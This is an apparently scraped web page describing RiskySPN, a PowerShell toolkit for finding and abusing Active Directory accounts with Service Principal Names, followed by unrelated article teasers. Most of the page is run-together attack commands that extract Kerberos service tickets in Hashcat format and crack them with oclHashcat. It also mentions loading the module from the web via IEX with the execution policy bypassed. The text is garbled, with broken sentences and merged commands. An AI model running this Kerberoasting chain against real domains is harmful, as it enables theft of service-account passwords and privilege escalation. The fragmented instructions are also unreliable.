RiskySPN is a collection of PowerShell scripts focused on detecting and abusing accounts associated with SPNs (Service Principal Name). This module can assist blue teams to identify potentially risky SPNs as well as red teams to escalate privileges by leveraging Kerberos and Active Directory.
Import-Module .\RiskySPNs.psm1 IEX from the web). .\Find-PotentiallyCrackableAccounts.ps1 Make sure Set-ExecutionPolicy is Unrestricted or Bypass
Get-Help Get-TGSCipher -Full All functions also have the -Verbosemode
Find-PotentiallyCrackableAccounts Sensitive + RC4 = $$$
Export-PotentiallyCrackableAccounts Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433" Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3 General Working of a Web Application Firewall (WAF) A Web Application Firewall (WAF) acts as…
How to Send POST Requests Using curl in Linux If you work with APIs, servers,…
If you are a Linux user, you have probably seen commands like chmod 777 while…
Vim and Vi are among the most powerful text editors in the Linux world. They…
Working with compressed files is a common task for any Linux user. Whether you are…
In the digital era, an email address can reveal much more than just a contact…